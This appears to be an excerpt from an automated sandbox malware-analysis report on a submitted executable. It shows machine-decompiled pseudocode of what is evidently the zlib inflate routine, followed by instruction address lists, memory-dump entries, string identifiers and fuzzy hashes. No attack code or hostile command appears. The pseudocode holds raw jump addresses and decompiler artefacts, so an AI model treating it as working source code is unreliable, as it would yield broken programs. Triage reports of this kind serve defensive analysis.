				if ( *((intOrPtr*)(__r13 + 0x18)) == 0) goto 0x35c48c4b;
				if (_t424 - 0x20 >= 0) goto 0x35c48c01;
				if (_t597 == 0) goto 0x35c47f07;
				_t633 = _t632 + (( *_t792 & 0x000000ff) << _t424);
				_t425 = _t424 + 8;
				if (_t425 - 0x20 < 0) goto 0x35c48be3;
				if (_t633 ==  *((intOrPtr*)(__r13 + 0x24))) goto 0x35c48c45;
				_t756 = "incorrect length check";
				 *(_t811 + 0x20) = "incorrect length check";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d5c;
				 *((long long*)(_t811 + 0x10)) = _t806;
				 *(_t811 + 0x18) = r10d;
				 *_t811 =  &(_t792[1]);
				 *((intOrPtr*)(_t811 + 8)) = _t597 - 1;
				 *(__r13 + 0x48) = _t633;
				 *(__r13 + 0x4c) = _t425;
				goto 0x35c48d6a;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f50;
				r15d = 1;
				r14d =  *(_t797 + 0xa0);
				r15d = 1;
				r14d =  *(_t797 + 0xa0);
				r15d = 0xfffffffd;
				goto 0x35c47f0f;
				r14d =  *(_t797 + 0xa0);
				goto 0x35c47f16;
				r14d = r14d -  *(_t811 + 0x18);
				r10d =  *(_t797 + 0x38);
				r10d = r10d -  *((intOrPtr*)(_t811 + 8));
				 *((intOrPtr*)(_t811 + 0xc)) =  *((intOrPtr*)(_t811 + 0xc)) + r10d;
				 *((intOrPtr*)(_t811 + 0x1c)) =  *((intOrPtr*)(_t811 + 0x1c)) + r14d;
				 *((intOrPtr*)(__r13 + 0x24)) =  *((intOrPtr*)(__r13 + 0x24)) + r14d;
				 *(_t797 + 0x38) = r10d;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c48cf2;
				if (r14d == 0) goto 0x35c48cf2;
				r8d = r14d;
				_t541 =  *(__r13 + 0x20);
				if ( *((intOrPtr*)(__r13 + 0x18)) == 0) goto 0x35c48cdf;
				E00007FF77FF735C49520( *((intOrPtr*)(_t811 + 0x10)) - _t756);
				goto 0x35c48ce4;
				_t390 = E00007FF77FF735C49230(_t541, _t756,  *((intOrPtr*)(_t811 + 0x10)) - _t756, _t799, _t806);
				r10d =  *(_t797 + 0x38);
				 *(__r13 + 0x20) = _t390;
				 *(_t811 + 0x4c) = _t390;
				_t582 =  *((intOrPtr*)(__r13 + 8));
				if (_t582 == 0x3f47) goto 0x35c48d0e;
				if (_t582 == 0x3f42) goto 0x35c48d0e;
				r9d = 0;
				r8d = r9d;
				goto 0x35c48d17;
				r8d = 0x100;
				r9d = 0;
				asm("sbb ecx, ecx");
				r9d =  ==  ? 0x80 : r9d;
				 *((intOrPtr*)(_t811 + 0x48)) = (_t541 & 0x00000040) + r9d +  *(__r13 + 0x4c) + r8d;
				if (r10d != 0) goto 0x35c48d4a;
				if (r14d == 0) goto 0x35c48d54;
				if ( *((intOrPtr*)(_t797 + 0xa8)) != 4) goto 0x35c48d60;
				r15d =  ==  ? 0xfffffffb : r15d;
				goto 0x35c48d6a;
				return 0xfffffffe;
			}




































































































































                                                                                                                                                                                                                              0x7ff735c48098
                                                                                                                                                                                                                              0x7ff735c48098
                                                                                                                                                                                                                              0x7ff735c48098
                                                                                                                                                                                                                              0x7ff735c4809b
                                                                                                                                                                                                                              0x7ff735c480a2
                                                                                                                                                                                                                              0x7ff735c480af
                                                                                                                                                                                                                              0x7ff735c480b1
                                                                                                                                                                                                                              0x7ff735c480b3
                                                                                                                                                                                                                              0x7ff735c480b6
                                                                                                                                                                                                                              0x7ff735c480bc
                                                                                                                                                                                                                              0x7ff735c480c0
                                                                                                                                                                                                                              0x7ff735c480c3
                                                                                                                                                                                                                              0x7ff735c480cb
                                                                                                                                                                                                                              0x7ff735c480d1
                                                                                                                                                                                                                              0x7ff735c480d9
                                                                                                                                                                                                                              0x7ff735c480e6
                                                                                                                                                                                                                              0x7ff735c480e8
                                                                                                                                                                                                                              0x7ff735c480ef
                                                                                                                                                                                                                              0x7ff735c480f9
                                                                                                                                                                                                                              0x7ff735c48102
                                                                                                                                                                                                                              0x7ff735c48108
                                                                                                                                                                                                                              0x7ff735c4810f
                                                                                                                                                                                                                              0x7ff735c48122
                                                                                                                                                                                                                              0x7ff735c48127
                                                                                                                                                                                                                              0x7ff735c48132
                                                                                                                                                                                                                              0x7ff735c4813f
                                                                                                                                                                                                                              0x7ff735c48141
                                                                                                                                                                                                                              0x7ff735c48143
                                                                                                                                                                                                                              0x7ff735c48146
                                                                                                                                                                                                                              0x7ff735c4814c
                                                                                                                                                                                                                              0x7ff735c4815f
                                                                                                                                                                                                                              0x7ff735c4816b
                                                                                                                                                                                                                              0x7ff735c48174
                                                                                                                                                                                                                              0x7ff735c4817b
                                                                                                                                                                                                                              0x7ff735c48186
                                                                                                                                                                                                                              0x7ff735c4818b
                                                                                                                                                                                                                              0x7ff735c481a0
                                                                                                                                                                                                                              0x7ff735c481a9
                                                                                                                                                                                                                              0x7ff735c481b8
                                                                                                                                                                                                                              0x7ff735c481ba
                                                                                                                                                                                                                              0x7ff735c481be
                                                                                                                                                                                                                              0x7ff735c481c5
                                                                                                                                                                                                                              0x7ff735c481d2
                                                                                                                                                                                                                              0x7ff735c481d6
                                                                                                                                                                                                                              0x7ff735c481e7
                                                                                                                                                                                                                              0x7ff735c481ec
                                                                                                                                                                                                                              0x7ff735c481f3
                                                                                                                                                                                                                              0x7ff735c481f3
                                                                                                                                                                                                                              0x7ff735c481f7
                                                                                                                                                                                                                              0x7ff735c481fc
                                                                                                                                                                                                                              0x7ff735c48205
                                                                                                                                                                                                                              0x7ff735c4820e
                                                                                                                                                                                                                              0x7ff735c48213
                                                                                                                                                                                                                              0x7ff735c4821b
                                                                                                                                                                                                                              0x7ff735c48220
                                                                                                                                                                                                                              0x7ff735c48227
                                                                                                                                                                                                                              0x7ff735c4822c
                                                                                                                                                                                                                              0x7ff735c48234
                                                                                                                                                                                                                              0x7ff735c48239
                                                                                                                                                                                                                              0x7ff735c48245
                                                                                                                                                                                                                              0x7ff735c48254
                                                                                                                                                                                                                              0x7ff735c48262
                                                                                                                                                                                                                              0x7ff735c48274
                                                                                                                                                                                                                              0x7ff735c4827a
                                                                                                                                                                                                                              0x7ff735c4827e
                                                                                                                                                                                                                              0x7ff735c48281
                                                                                                                                                                                                                              0x7ff735c48289
                                                                                                                                                                                                                              0x7ff735c4828c
                                                                                                                                                                                                                              0x7ff735c48295
                                                                                                                                                                                                                              0x7ff735c4829b
                                                                                                                                                                                                                              0x7ff735c4829f
                                                                                                                                                                                                                              0x7ff735c482a5
                                                                                                                                                                                                                              0x7ff735c482a9
                                                                                                                                                                                                                              0x7ff735c482b6
                                                                                                                                                                                                                              0x7ff735c482ba
                                                                                                                                                                                                                              0x7ff735c482bf
                                                                                                                                                                                                                              0x7ff735c482c5
                                                                                                                                                                                                                              0x7ff735c482c8
                                                                                                                                                                                                                              0x7ff735c482ce
                                                                                                                                                                                                                              0x7ff735c482d1
                                                                                                                                                                                                                              0x7ff735c482d7
                                                                                                                                                                                                                              0x7ff735c482db
                                                                                                                                                                                                                              0x7ff735c482e1
                                                                                                                                                                                                                              0x7ff735c482e3
                                                                                                                                                                                                                              0x7ff735c482e8
                                                                                                                                                                                                                              0x7ff735c482f5
                                                                                                                                                                                                                              0x7ff735c482fe
                                                                                                                                                                                                                              0x7ff735c48307
                                                                                                                                                                                                                              0x7ff735c4830e
                                                                                                                                                                                                                              0x7ff735c48315
                                                                                                                                                                                                                              0x7ff735c4831d
                                                                                                                                                                                                                              0x7ff735c4831f
                                                                                                                                                                                                                              0x7ff735c48324
                                                                                                                                                                                                                              0x7ff735c48328
                                                                                                                                                                                                                              0x7ff735c48335
                                                                                                                                                                                                                              0x7ff735c48339
                                                                                                                                                                                                                              0x7ff735c4833c
                                                                                                                                                                                                                              0x7ff735c48341
                                                                                                                                                                                                                              0x7ff735c48343
                                                                                                                                                                                                                              0x7ff735c48351
                                                                                                                                                                                                                              0x7ff735c48355
                                                                                                                                                                                                                              0x7ff735c4835d
                                                                                                                                                                                                                              0x7ff735c4836b
                                                                                                                                                                                                                              0x7ff735c48374
                                                                                                                                                                                                                              0x7ff735c4837e
                                                                                                                                                                                                                              0x7ff735c48380
                                                                                                                                                                                                                              0x7ff735c48385
                                                                                                                                                                                                                              0x7ff735c48389
                                                                                                                                                                                                                              0x7ff735c48396
                                                                                                                                                                                                                              0x7ff735c4839a
                                                                                                                                                                                                                              0x7ff735c4839d
                                                                                                                                                                                                                              0x7ff735c483a2
                                                                                                                                                                                                                              0x7ff735c483ae
                                                                                                                                                                                                                              0x7ff735c483b0
                                                                                                                                                                                                                              0x7ff735c483be
                                                                                                                                                                                                                              0x7ff735c483c0
                                                                                                                                                                                                                              0x7ff735c483c5
                                                                                                                                                                                                                              0x7ff735c483c9
                                                                                                                                                                                                                              0x7ff735c483d6
                                                                                                                                                                                                                              0x7ff735c483dd
                                                                                                                                                                                                                              0x7ff735c483e2
                                                                                                                                                                                                                              0x7ff735c483e4
                                                                                                                                                                                                                              0x7ff735c483ee
                                                                                                                                                                                                                              0x7ff735c483f0
                                                                                                                                                                                                                              0x7ff735c48417
                                                                                                                                                                                                                              0x7ff735c48419
                                                                                                                                                                                                                              0x7ff735c48427
                                                                                                                                                                                                                              0x7ff735c48430
                                                                                                                                                                                                                              0x7ff735c48437
                                                                                                                                                                                                                              0x7ff735c4843b
                                                                                                                                                                                                                              0x7ff735c48445
                                                                                                                                                                                                                              0x7ff735c4844e
                                                                                                                                                                                                                              0x7ff735c48458
                                                                                                                                                                                                                              0x7ff735c48468
                                                                                                                                                                                                                              0x7ff735c48477
                                                                                                                                                                                                                              0x7ff735c48480
                                                                                                                                                                                                                              0x7ff735c48485
                                                                                                                                                                                                                              0x7ff735c4848d
                                                                                                                                                                                                                              0x7ff735c48499
                                                                                                                                                                                                                              0x7ff735c4849e
                                                                                                                                                                                                                              0x7ff735c484a6
                                                                                                                                                                                                                              0x7ff735c484ab
                                                                                                                                                                                                                              0x7ff735c484b2
                                                                                                                                                                                                                              0x7ff735c484ba
                                                                                                                                                                                                                              0x7ff735c484c1
                                                                                                                                                                                                                              0x7ff735c484c8
                                                                                                                                                                                                                              0x7ff735c484d7
                                                                                                                                                                                                                              0x7ff735c484e3
                                                                                                                                                                                                                              0x7ff735c484e8
                                                                                                                                                                                                                              0x7ff735c484f0
                                                                                                                                                                                                                              0x7ff735c484f5
                                                                                                                                                                                                                              0x7ff735c484fe
                                                                                                                                                                                                                              0x7ff735c48507
                                                                                                                                                                                                                              0x7ff735c4850c
                                                                                                                                                                                                                              0x7ff735c48514
                                                                                                                                                                                                                              0x7ff735c48519
                                                                                                                                                                                                                              0x7ff735c48520
                                                                                                                                                                                                                              0x7ff735c48524
                                                                                                                                                                                                                              0x7ff735c48532
                                                                                                                                                                                                                              0x7ff735c4853a
                                                                                                                                                                                                                              0x7ff735c48540
                                                                                                                                                                                                                              0x7ff735c48545
                                                                                                                                                                                                                              0x7ff735c4855a
                                                                                                                                                                                                                              0x7ff735c4855f
                                                                                                                                                                                                                              0x7ff735c48566
                                                                                                                                                                                                                              0x7ff735c4856b
                                                                                                                                                                                                                              0x7ff735c4856d
                                                                                                                                                                                                                              0x7ff735c48574
                                                                                                                                                                                                                              0x7ff735c48579
                                                                                                                                                                                                                              0x7ff735c48581
                                                                                                                                                                                                                              0x7ff735c4858d
                                                                                                                                                                                                                              0x7ff735c48598
                                                                                                                                                                                                                              0x7ff735c4859e
                                                                                                                                                                                                                              0x7ff735c485a6
                                                                                                                                                                                                                              0x7ff735c485a9
                                                                                                                                                                                                                              0x7ff735c485b1
                                                                                                                                                                                                                              0x7ff735c485bc
                                                                                                                                                                                                                              0x7ff735c485c5
                                                                                                                                                                                                                              0x7ff735c485cf
                                                                                                                                                                                                                              0x7ff735c485d4
                                                                                                                                                                                                                              0x7ff735c485d7
                                                                                                                                                                                                                              0x7ff735c485dc
                                                                                                                                                                                                                              0x7ff735c485e0
                                                                                                                                                                                                                              0x7ff735c485e5
                                                                                                                                                                                                                              0x7ff735c485e9
                                                                                                                                                                                                                              0x7ff735c485ed
                                                                                                                                                                                                                              0x7ff735c485ff
                                                                                                                                                                                                                              0x7ff735c48604
                                                                                                                                                                                                                              0x7ff735c48608
                                                                                                                                                                                                                              0x7ff735c48611
                                                                                                                                                                                                                              0x7ff735c48615
                                                                                                                                                                                                                              0x7ff735c4861a
                                                                                                                                                                                                                              0x7ff735c48622
                                                                                                                                                                                                                              0x7ff735c48628
                                                                                                                                                                                                                              0x7ff735c48633
                                                                                                                                                                                                                              0x7ff735c48641
                                                                                                                                                                                                                              0x7ff735c4864d
                                                                                                                                                                                                                              0x7ff735c48650
                                                                                                                                                                                                                              0x7ff735c48665
                                                                                                                                                                                                                              0x7ff735c48669
                                                                                                                                                                                                                              0x7ff735c48676
                                                                                                                                                                                                                              0x7ff735c48678
                                                                                                                                                                                                                              0x7ff735c4867a
                                                                                                                                                                                                                              0x7ff735c4867f
                                                                                                                                                                                                                              0x7ff735c48687
                                                                                                                                                                                                                              0x7ff735c48695
                                                                                                                                                                                                                              0x7ff735c48699
                                                                                                                                                                                                                              0x7ff735c486a1
                                                                                                                                                                                                                              0x7ff735c486a9
                                                                                                                                                                                                                              0x7ff735c486ad
                                                                                                                                                                                                                              0x7ff735c486b3
                                                                                                                                                                                                                              0x7ff735c486be
                                                                                                                                                                                                                              0x7ff735c486cb
                                                                                                                                                                                                                              0x7ff735c486d1
                                                                                                                                                                                                                              0x7ff735c486d4
                                                                                                                                                                                                                              0x7ff735c486d7
                                                                                                                                                                                                                              0x7ff735c486da
                                                                                                                                                                                                                              0x7ff735c486e6
                                                                                                                                                                                                                              0x7ff735c486ea
                                                                                                                                                                                                                              0x7ff735c486f0
                                                                                                                                                                                                                              0x7ff735c486f2
                                                                                                                                                                                                                              0x7ff735c486fa
                                                                                                                                                                                                                              0x7ff735c48707
                                                                                                                                                                                                                              0x7ff735c4870d
                                                                                                                                                                                                                              0x7ff735c48715
                                                                                                                                                                                                                              0x7ff735c48717
                                                                                                                                                                                                                              0x7ff735c4871a
                                                                                                                                                                                                                              0x7ff735c4871d
                                                                                                                                                                                                                              0x7ff735c48723
                                                                                                                                                                                                                              0x7ff735c48726
                                                                                                                                                                                                                              0x7ff735c48729
                                                                                                                                                                                                                              0x7ff735c4872c
                                                                                                                                                                                                                              0x7ff735c4872f
                                                                                                                                                                                                                              0x7ff735c48738
                                                                                                                                                                                                                              0x7ff735c4873c
                                                                                                                                                                                                                              0x7ff735c48742
                                                                                                                                                                                                                              0x7ff735c48744
                                                                                                                                                                                                                              0x7ff735c4874c
                                                                                                                                                                                                                              0x7ff735c48758
                                                                                                                                                                                                                              0x7ff735c4875b
                                                                                                                                                                                                                              0x7ff735c48762
                                                                                                                                                                                                                              0x7ff735c4876b
                                                                                                                                                                                                                              0x7ff735c48771
                                                                                                                                                                                                                              0x7ff735c48773
                                                                                                                                                                                                                              0x7ff735c4877b
                                                                                                                                                                                                                              0x7ff735c48782
                                                                                                                                                                                                                              0x7ff735c48784
                                                                                                                                                                                                                              0x7ff735c4878f
                                                                                                                                                                                                                              0x7ff735c48796
                                                                                                                                                                                                                              0x7ff735c48798
                                                                                                                                                                                                                              0x7ff735c4879f
                                                                                                                                                                                                                              0x7ff735c487a4
                                                                                                                                                                                                                              0x7ff735c487ac
                                                                                                                                                                                                                              0x7ff735c487b7
                                                                                                                                                                                                                              0x7ff735c487bf
                                                                                                                                                                                                                              0x7ff735c487c3
                                                                                                                                                                                                                              0x7ff735c487c9
                                                                                                                                                                                                                              0x7ff735c487cd
                                                                                                                                                                                                                              0x7ff735c487d2
                                                                                                                                                                                                                              0x7ff735c487df
                                                                                                                                                                                                                              0x7ff735c487e1
                                                                                                                                                                                                                              0x7ff735c487e3
                                                                                                                                                                                                                              0x7ff735c487e6
                                                                                                                                                                                                                              0x7ff735c487eb
                                                                                                                                                                                                                              0x7ff735c487ed
                                                                                                                                                                                                                              0x7ff735c487f6
                                                                                                                                                                                                                              0x7ff735c487fe
                                                                                                                                                                                                                              0x7ff735c48802
                                                                                                                                                                                                                              0x7ff735c4880d
                                                                                                                                                                                                                              0x7ff735c48814
                                                                                                                                                                                                                              0x7ff735c48825
                                                                                                                                                                                                                              0x7ff735c48831
                                                                                                                                                                                                                              0x7ff735c48842
                                                                                                                                                                                                                              0x7ff735c48846
                                                                                                                                                                                                                              0x7ff735c48853
                                                                                                                                                                                                                              0x7ff735c48855
                                                                                                                                                                                                                              0x7ff735c48857
                                                                                                                                                                                                                              0x7ff735c4885c
                                                                                                                                                                                                                              0x7ff735c48864
                                                                                                                                                                                                                              0x7ff735c48872
                                                                                                                                                                                                                              0x7ff735c48876
                                                                                                                                                                                                                              0x7ff735c4887e
                                                                                                                                                                                                                              0x7ff735c48882
                                                                                                                                                                                                                              0x7ff735c48888
                                                                                                                                                                                                                              0x7ff735c48893
                                                                                                                                                                                                                              0x7ff735c488a0
                                                                                                                                                                                                                              0x7ff735c488a6
                                                                                                                                                                                                                              0x7ff735c488a9
                                                                                                                                                                                                                              0x7ff735c488ac
                                                                                                                                                                                                                              0x7ff735c488af
                                                                                                                                                                                                                              0x7ff735c488bb
                                                                                                                                                                                                                              0x7ff735c488bf
                                                                                                                                                                                                                              0x7ff735c488c5
                                                                                                                                                                                                                              0x7ff735c488c7
                                                                                                                                                                                                                              0x7ff735c488d2
                                                                                                                                                                                                                              0x7ff735c488df
                                                                                                                                                                                                                              0x7ff735c488e5
                                                                                                                                                                                                                              0x7ff735c488ed
                                                                                                                                                                                                                              0x7ff735c488ef
                                                                                                                                                                                                                              0x7ff735c488f2
                                                                                                                                                                                                                              0x7ff735c488f5
                                                                                                                                                                                                                              0x7ff735c488fb
                                                                                                                                                                                                                              0x7ff735c488fe
                                                                                                                                                                                                                              0x7ff735c48901
                                                                                                                                                                                                                              0x7ff735c48904
                                                                                                                                                                                                                              0x7ff735c48907
                                                                                                                                                                                                                              0x7ff735c48910
                                                                                                                                                                                                                              0x7ff735c48914
                                                                                                                                                                                                                              0x7ff735c4891a
                                                                                                                                                                                                                              0x7ff735c4891c
                                                                                                                                                                                                                              0x7ff735c48924
                                                                                                                                                                                                                              0x7ff735c4892b
                                                                                                                                                                                                                              0x7ff735c48938
                                                                                                                                                                                                                              0x7ff735c4893b
                                                                                                                                                                                                                              0x7ff735c48942
                                                                                                                                                                                                                              0x7ff735c48948
                                                                                                                                                                                                                              0x7ff735c48951
                                                                                                                                                                                                                              0x7ff735c48956
                                                                                                                                                                                                                              0x7ff735c4895e
                                                                                                                                                                                                                              0x7ff735c48963
                                                                                                                                                                                                                              0x7ff735c48970
                                                                                                                                                                                                                              0x7ff735c4897a
                                                                                                                                                                                                                              0x7ff735c48982
                                                                                                                                                                                                                              0x7ff735c48986
                                                                                                                                                                                                                              0x7ff735c4898c
                                                                                                                                                                                                                              0x7ff735c48990
                                                                                                                                                                                                                              0x7ff735c48994
                                                                                                                                                                                                                              0x7ff735c489a1
                                                                                                                                                                                                                              0x7ff735c489a3
                                                                                                                                                                                                                              0x7ff735c489a5
                                                                                                                                                                                                                              0x7ff735c489a8
                                                                                                                                                                                                                              0x7ff735c489ad
                                                                                                                                                                                                                              0x7ff735c489af
                                                                                                                                                                                                                              0x7ff735c489b8
                                                                                                                                                                                                                              0x7ff735c489be
                                                                                                                                                                                                                              0x7ff735c489c0
                                                                                                                                                                                                                              0x7ff735c489c4
                                                                                                                                                                                                                              0x7ff735c489cb
                                                                                                                                                                                                                              0x7ff735c489d6
                                                                                                                                                                                                                              0x7ff735c489dc
                                                                                                                                                                                                                              0x7ff735c489e3
                                                                                                                                                                                                                              0x7ff735c489e8
                                                                                                                                                                                                                              0x7ff735c489ea
                                                                                                                                                                                                                              0x7ff735c489f0
                                                                                                                                                                                                                              0x7ff735c489fa
                                                                                                                                                                                                                              0x7ff735c489fc
                                                                                                                                                                                                                              0x7ff735c48a03
                                                                                                                                                                                                                              0x7ff735c48a08
                                                                                                                                                                                                                              0x7ff735c48a10
                                                                                                                                                                                                                              0x7ff735c48a15
                                                                                                                                                                                                                              0x7ff735c48a1b
                                                                                                                                                                                                                              0x7ff735c48a23
                                                                                                                                                                                                                              0x7ff735c48a2b
                                                                                                                                                                                                                              0x7ff735c48a35
                                                                                                                                                                                                                              0x7ff735c48a39
                                                                                                                                                                                                                              0x7ff735c48a40
                                                                                                                                                                                                                              0x7ff735c48a47
                                                                                                                                                                                                                              0x7ff735c48a50
                                                                                                                                                                                                                              0x7ff735c48a54
                                                                                                                                                                                                                              0x7ff735c48a59
                                                                                                                                                                                                                              0x7ff735c48a5c
                                                                                                                                                                                                                              0x7ff735c48a5f
                                                                                                                                                                                                                              0x7ff735c48a6a
                                                                                                                                                                                                                              0x7ff735c48a75
                                                                                                                                                                                                                              0x7ff735c48a78
                                                                                                                                                                                                                              0x7ff735c48a7e
                                                                                                                                                                                                                              0x7ff735c48a80
                                                                                                                                                                                                                              0x7ff735c48a89
                                                                                                                                                                                                                              0x7ff735c48a8f
                                                                                                                                                                                                                              0x7ff735c48a9f
                                                                                                                                                                                                                              0x7ff735c48aaa
                                                                                                                                                                                                                              0x7ff735c48aad
                                                                                                                                                                                                                              0x7ff735c48ab0
                                                                                                                                                                                                                              0x7ff735c48ab3
                                                                                                                                                                                                                              0x7ff735c48ab8
                                                                                                                                                                                                                              0x7ff735c48ac0
                                                                                                                                                                                                                              0x7ff735c48ac8
                                                                                                                                                                                                                              0x7ff735c48ad2
                                                                                                                                                                                                                              0x7ff735c48adb
                                                                                                                                                                                                                              0x7ff735c48ae2
                                                                                                                                                                                                                              0x7ff735c48aef
                                                                                                                                                                                                                              0x7ff735c48af1
                                                                                                                                                                                                                              0x7ff735c48af3
                                                                                                                                                                                                                              0x7ff735c48afc
                                                                                                                                                                                                                              0x7ff735c48afe
                                                                                                                                                                                                                              0x7ff735c48b01
                                                                                                                                                                                                                              0x7ff735c48b06
                                                                                                                                                                                                                              0x7ff735c48b10
                                                                                                                                                                                                                              0x7ff735c48b15
                                                                                                                                                                                                                              0x7ff735c48b29
                                                                                                                                                                                                                              0x7ff735c48b2b
                                                                                                                                                                                                                              0x7ff735c48b30
                                                                                                                                                                                                                              0x7ff735c48b32
                                                                                                                                                                                                                              0x7ff735c48b37
                                                                                                                                                                                                                              0x7ff735c48b3f
                                                                                                                                                                                                                              0x7ff735c48b43
                                                                                                                                                                                                                              0x7ff735c48b4c
                                                                                                                                                                                                                              0x7ff735c48b54
                                                                                                                                                                                                                              0x7ff735c48b59
                                                                                                                                                                                                                              0x7ff735c48b62
                                                                                                                                                                                                                              0x7ff735c48b8b
                                                                                                                                                                                                                              0x7ff735c48b94
                                                                                                                                                                                                                              0x7ff735c48b99
                                                                                                                                                                                                                              0x7ff735c48ba1
                                                                                                                                                                                                                              0x7ff735c48ba6
                                                                                                                                                                                                                              0x7ff735c48ba9
                                                                                                                                                                                                                              0x7ff735c48bb1
                                                                                                                                                                                                                              0x7ff735c48bb4
                                                                                                                                                                                                                              0x7ff735c48bb6
                                                                                                                                                                                                                              0x7ff735c48bbe
                                                                                                                                                                                                                              0x7ff735c48bc8
                                                                                                                                                                                                                              0x7ff735c48bd5
                                                                                                                                                                                                                              0x7ff735c48bdc
                                                                                                                                                                                                                              0x7ff735c48be1
                                                                                                                                                                                                                              0x7ff735c48be5
                                                                                                                                                                                                                              0x7ff735c48bf4
                                                                                                                                                                                                                              0x7ff735c48bf9
                                                                                                                                                                                                                              0x7ff735c48bff
                                                                                                                                                                                                                              0x7ff735c48c05
                                                                                                                                                                                                                              0x7ff735c48c07
                                                                                                                                                                                                                              0x7ff735c48c0e
                                                                                                                                                                                                                              0x7ff735c48c13
                                                                                                                                                                                                                              0x7ff735c48c1b
                                                                                                                                                                                                                              0x7ff735c48c20
                                                                                                                                                                                                                              0x7ff735c48c2a
                                                                                                                                                                                                                              0x7ff735c48c2f
                                                                                                                                                                                                                              0x7ff735c48c33
                                                                                                                                                                                                                              0x7ff735c48c38
                                                                                                                                                                                                                              0x7ff735c48c3c
                                                                                                                                                                                                                              0x7ff735c48c40
                                                                                                                                                                                                                              0x7ff735c48c4b
                                                                                                                                                                                                                              0x7ff735c48c53
                                                                                                                                                                                                                              0x7ff735c48c5e
                                                                                                                                                                                                                              0x7ff735c48c66
                                                                                                                                                                                                                              0x7ff735c48c71
                                                                                                                                                                                                                              0x7ff735c48c79
                                                                                                                                                                                                                              0x7ff735c48c7f
                                                                                                                                                                                                                              0x7ff735c48c84
                                                                                                                                                                                                                              0x7ff735c48c8c
                                                                                                                                                                                                                              0x7ff735c48c91
                                                                                                                                                                                                                              0x7ff735c48c96
                                                                                                                                                                                                                              0x7ff735c48c9b
                                                                                                                                                                                                                              0x7ff735c48ca0
                                                                                                                                                                                                                              0x7ff735c48ca5
                                                                                                                                                                                                                              0x7ff735c48caa
                                                                                                                                                                                                                              0x7ff735c48cb3
                                                                                                                                                                                                                              0x7ff735c48cb8
                                                                                                                                                                                                                              0x7ff735c48cbd
                                                                                                                                                                                                                              0x7ff735c48cc4
                                                                                                                                                                                                                              0x7ff735c48cc7
                                                                                                                                                                                                                              0x7ff735c48cd6
                                                                                                                                                                                                                              0x7ff735c48cd8
                                                                                                                                                                                                                              0x7ff735c48cdd
                                                                                                                                                                                                                              0x7ff735c48cdf
                                                                                                                                                                                                                              0x7ff735c48ce4
                                                                                                                                                                                                                              0x7ff735c48ce9
                                                                                                                                                                                                                              0x7ff735c48ced
                                                                                                                                                                                                                              0x7ff735c48cf2
                                                                                                                                                                                                                              0x7ff735c48cfc
                                                                                                                                                                                                                              0x7ff735c48d04
                                                                                                                                                                                                                              0x7ff735c48d06
                                                                                                                                                                                                                              0x7ff735c48d09
                                                                                                                                                                                                                              0x7ff735c48d0c
                                                                                                                                                                                                                              0x7ff735c48d0e
                                                                                                                                                                                                                              0x7ff735c48d14
                                                                                                                                                                                                                              0x7ff735c48d22
                                                                                                                                                                                                                              0x7ff735c48d2d
                                                                                                                                                                                                                              0x7ff735c48d3b
                                                                                                                                                                                                                              0x7ff735c48d43
                                                                                                                                                                                                                              0x7ff735c48d48
                                                                                                                                                                                                                              0x7ff735c48d52
                                                                                                                                                                                                                              0x7ff735c48d5c
                                                                                                                                                                                                                              0x7ff735c48d63
                                                                                                                                                                                                                              0x7ff735c48d7a

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                              • API String ID: 0-2665694366
                                                                                                                                                                                                                              • Opcode ID: 4454104dca3eb691f43f4d566b0c020e4a62fe734dca9af32ad71a8f3142c87e
                                                                                                                                                                                                                              • Instruction ID: 3b151ed466a9076314b1b2ad24c76dac5311da56b45bd65990bca422b35d1d65
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4454104dca3eb691f43f4d566b0c020e4a62fe734dca9af32ad71a8f3142c87e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D952F4B3A186A79BD795AE18D448E7E77EEFB84704F414139E64982780DB3CD844DB10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5A588 Relevance: 10.8, APIs: 7, Instructions: 286COMMONLIBRARYCODECrypto
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
